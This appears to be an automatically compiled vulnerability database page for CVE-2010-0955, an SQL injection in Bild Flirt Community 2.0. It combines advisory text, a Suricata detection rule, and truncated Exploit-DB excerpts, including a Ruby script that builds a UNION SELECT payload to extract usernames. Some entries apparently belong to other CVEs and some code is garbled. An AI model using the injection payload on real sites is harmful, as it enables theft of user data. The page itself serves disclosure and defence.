CVE-2010-0955
Published 2010-03-10
CVE-2010-0955: SQL injection vulnerability in index.php in Bild Flirt Community 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Priority: P343, high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 1.21% (64.6th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| media-products | bild_flirt_community | — | — |
VulDB
Media-products Bild Flirt Community 2.0 index.php ID sql injection (EDB-11648 / XFDB-56727)
vuldb·2026-05-02·CVSS 7.5
CVE-2010-0955 [HIGH] Media-products Bild Flirt Community 2.0 index.php ID sql injection (EDB-11648 / XFDB-56727)
A vulnerability described as critical has been identified in Media-products Bild Flirt Community 2.0. This affects an unknown part of the file index.php. Executing a manipulation of the argument ID can lead to sql injection.
This vulnerability is registered as CVE-2010-0955. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-689m-m73q-6jmw: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-02
CVE-2010-0955 [HIGH] CWE-89 GHSA-689m-m73q-6jmw: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Bild Flirt Community 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Suricata
GPL FTP SITE EXEC attempt
suricata·2010-09-23
CVE-1999-0080 GPL FTP SITE EXEC attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP SITE EXEC attempt"; flow:established,to_server; content:"SITE"; nocase; content:"EXEC"; distance:0; nocase; pcre:"/^SITE\s+EXEC/smi"; reference:arachnids,317; reference:bugtraq,2241; reference:cve,1999-0080; reference:cve,1999-0955; classtype:bad-unknown; sid:2100361; rev:18; metadata:created_at 2010_09_23, cve CVE_1999_0080, signature_severity Unknown, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0955 Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: creative_software_cachefolder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When
sending an overly long string to the cachefolder() property of CTSUEng.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
Bild Flirt System 1.0 - SQL Injection
exploitdb·2010-04-14
CVE-2010-0955 Bild Flirt System 1.0 - SQL Injection
---
----------------------------Information------------------------------------------------
+Name :Bild Flirt "
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "#########################################################"
print "\nEnter script path (userid)->"
userid=gets.chomp
print "#########################################################"
begin
dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,name,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nThe Username is -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?id=999999999+
Exploit-DB
Bild Flirt System 2.0 - 'index.php?id' SQL Injection
exploitdb·2010-03-07
CVE-2010-0955 Bild Flirt System 2.0 - 'index.php?id' SQL Injection
---
----------------------------Information------------------------------------------------
+Name : Bild Flirt System V2.0 index.php (id) SQL Injection
+Author : Easy Laster
+Date : 07.03.2010
+Script : Bild Flirt System V2.0
+Price : 14,95€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.
No writeups or analysis indexed.
http://4004securityproject.wordpress.com/2010/03/07/bild-flirt-system-v2-0-index-php-id-sql-injection/
http://osvdb.org/62780
http://packetstormsecurity.org/1003-exploits/bildflirt-sql.txt
http://secunia.com/advisories/38870
http://www.exploit-db.com/exploits/11648
http://www.securityfocus.com/bid/38585
https://exchange.xforce.ibmcloud.com/vulnerabilities/56727